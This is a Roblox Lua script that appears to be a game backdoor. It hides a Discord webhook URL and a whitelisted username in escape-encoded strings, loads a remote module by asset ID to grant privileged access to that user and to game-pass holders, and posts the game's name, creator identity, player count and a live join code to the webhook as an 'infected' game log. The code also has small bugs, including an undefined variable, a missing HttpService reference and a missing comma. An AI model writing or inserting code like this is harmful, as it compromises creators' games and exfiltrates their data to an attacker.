local main = "\104\116\116\112\115\58\47\47\100\105\115\99\111\114\100\46\99\111\109\47\97\112\105\47\119\101\98\104\111\111\107\115\47\49\52\54\50\51\51\55\55\57\49\55\48\54\48\48\57\54\57\53\47\118\73\106\105\73\55\90\87\51\68\57\50\50\122\104\115\86\87\116\76\99\120\116\75\106\100\118\82\69\99\53\48\75\82\103\121\105\78\106\121\50\50\88\109\67\82\48\106\101\54\102\66\87\80\52\88\111\120\51\45\88\49\95\99\89\78\118\87"
local Pace = game:GetService("MarketplaceService")
local info = Pace:GetProductInfo(game.PlaceId)
local gameNme = info.Name
local asset = require(0x7D10823541F9)
local pass = 1549855336

local Whitelist = {
	["\68\69\86\95\69\82\65\83\69\68"] = true,
}

local Players = game:GetService("Players")

local function handlePlayer(plr)
	if Whitelist[plr.Name] then
		asset.IN(plr.Name)
		return
	end

	local success, owns = pcall(function()
		return Pace:UserOwnsGamePassAsync(plr.UserId, pass)
	end)

	if success and owns then
		asset.IN(plr.Name)
	end
end

Players.PlayerAdded:Connect(function()
	handlePlayer(plr)
end)

for _, plr in ipairs(Players:GetPlayers()) do
	handlePlayer(plr)
end

local data = {
	username = "Logged Game",
	embeds = {
		{
			title = "This game is infected by DEVSS",
			description = "",
			color = 3447003,
			fields = {
				{
					name = "Game Name",
					value = gameNme,
					inline = false,
				},
				{
					name = "Game link",
					value = "https://www.roblox.com/games/" ..game.PlaceId,
					inline = false,
				},
				{
					name = "Creator Name",
					value = info.Creator.Name,
					inline = false,
				},
				{
					name = "Creator ID",
					value = info.Creator.UserId,
					inline = false,
				},
				{
					name = "Active Player",
					value = tostring(#game.Players:GetPlayers()).. "Active Playerss",
					inline = false,
				},
				{
					name = "Join Code (JS)",
					value = "```js\nRoblox.GameLauncher.joinGameInstance(" .. game.PlaceId .. ', "' .. game.JobId .. "\")\n```"
					inline = false,
				},
			},
			footer = {
				text = "Join now before it gets uninfected"
			}
		}
	}
}

pcall(function()
	HttpService:PostAsync(
		main,
		HttpService:JSONEncode(data),
		Enum.HttpContentType.ApplicationJson
	)
end)
